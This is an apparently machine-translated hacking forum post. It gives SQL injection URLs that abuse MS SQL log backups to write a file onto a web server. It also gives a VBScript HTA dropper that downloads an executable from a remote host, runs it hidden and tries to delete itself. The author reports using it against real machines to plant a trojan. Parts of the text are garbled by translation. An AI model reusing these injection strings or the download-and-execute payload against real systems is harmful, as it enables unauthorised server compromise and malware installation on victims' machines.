From: Zero Customer Network Security
Author:Bloodsword
Asp? Id = 0; alter "> http: // 192.168.1.23/test. asp? Id = 0; alter database dbname set recovery full; create table temp (aa SQL _variant primary key )--
Copy codehttp: // 192.168.1.23/test. asp? Id = 0; declare @ a varchar (255); set @ a = 0x433a5425494e444f57535c54656d705c7e3039383631312e746d70; backup log dbname to disk = @ a with init --
Copy codehttp: // 192.168.1.23/test. asp? Id = 0; insert into temp values (values )--
Copy codehttp: // 192.168.1.23/test. asp? Id = 0; declare @ a varchar (255); set @ a = snapshot; backup log dbname to disk = @ --
Copy objects
Yes
Copy code <script language = "VBScript">
Window. moveTo 8888,8888
U = "http: // 192.168.1.23/test.exe"
P = "m.exe"
Set x = CreateObject ("Microsoft. XMLHTTP ")
X. Open "GET", u, 0
X. Send ()
Set s = CreateObject ("ADODB. Stream ")
S. Mode = 3
S. Type = 1
S. Open ()
S. Write (x. responseBody)
S. SaveToFile p, 2
Set w = CreateObject ("Wscript. Shell ")
W. Run p, 0
W. Run "cmd/c del a. hta", 0
Window. resizeTo 0, 0
Window. close
</Script>
Hexadecimal
There seems to be a problem with self-deletion. Sometimes it cannot be deleted.
I personally think that this section has a higher success rate than the statements circulating on the Internet.
Experimental results: a total of three machines were backed up a few days ago. One was sure to be backed up. One was sure not to be backed up, and the other was unable to list the directories, are you sure you want to back up the machine and launch the bird? The success rate is good.